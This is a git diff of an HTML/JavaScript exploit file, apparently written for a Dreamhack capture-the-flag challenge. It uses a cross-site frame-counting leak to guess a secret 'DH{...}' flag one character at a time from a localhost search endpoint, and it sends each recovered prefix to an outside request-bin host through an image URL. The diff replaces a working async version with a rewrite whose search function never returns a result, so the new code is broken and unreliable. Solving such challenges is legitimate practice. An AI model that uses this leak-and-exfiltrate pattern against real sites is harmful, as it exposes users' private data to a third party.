--- a/static/js/test.html
+++ b/static/js/test.html
@@ -1,57 +1,26 @@
 <img id="img">
+<iframe id="iframe"></iframe>
 <script>
-    async function search(query) {
-        return new Promise((resolve) => {
-            const iframe = document.createElement("iframe");
-            iframe.style.display = "none";
-            iframe.src = `http://localhost:8000/search?query=${query}`;
-            document.body.appendChild(iframe);
+    function search(query) {
+        const iframe = document.getElementById("iframe");
+        iframe.src = `http://localhost:8000/search?query=${query}`;
 
-            iframe.onload = () => {
-                let result;
-                try {
-                    result = iframe.contentWindow.frames.length;
-                } catch (e) {
-                    result = 0;
-                }
-                document.body.removeChild(iframe);
-                resolve(result != 0);
-            };
-
-            setTimeout(() => {
-                document.body.removeChild(iframe);
-                resolve(false);
-            }, 3000);
-        });
+        iframe.onload = () => {
+            return iframe.contentWindow.frames.length != 0;
+        };
     }
 
-    async function exploit() {
-        let chars = "0123456789abcdef}";
-        let secret = "DH{";
-        const img = document.getElementById("img");
+    let chars = "0123456789abcdef}";
+    let secret = "DH{";
+    const img = document.getElementById("img");
 
-        while (!secret.includes("}")) {
-            let found = false;
-            let promises = chars.split("").map(c => 
-                search(secret + c).then(result => ({char:c, success:result}))
-            );
-            let results = await Promise.all(promises);
-
-            for (let rslt of results) {
-                if (rslt.success) {
-                    secret += rslt.char;
-                    found = true;
-                    img.src = `https://btvqydh.request.dreamhack.games/${secret}`;
-                    break;
-                }
-            }
-
-            if (!found) {
-                img.src = `https://btvqydh.request.dreamhack.games/failed`;
+    while (!secret.includes("}")) {
+        for (let c of chars) {
+            if (search(secret + c)) {
+                secret += c;
+                img.src = `https://rxoulox.request.dreamhack.games/${secret}`;
                 break;
             }
         }
     }
-
-    exploit();
 </script>
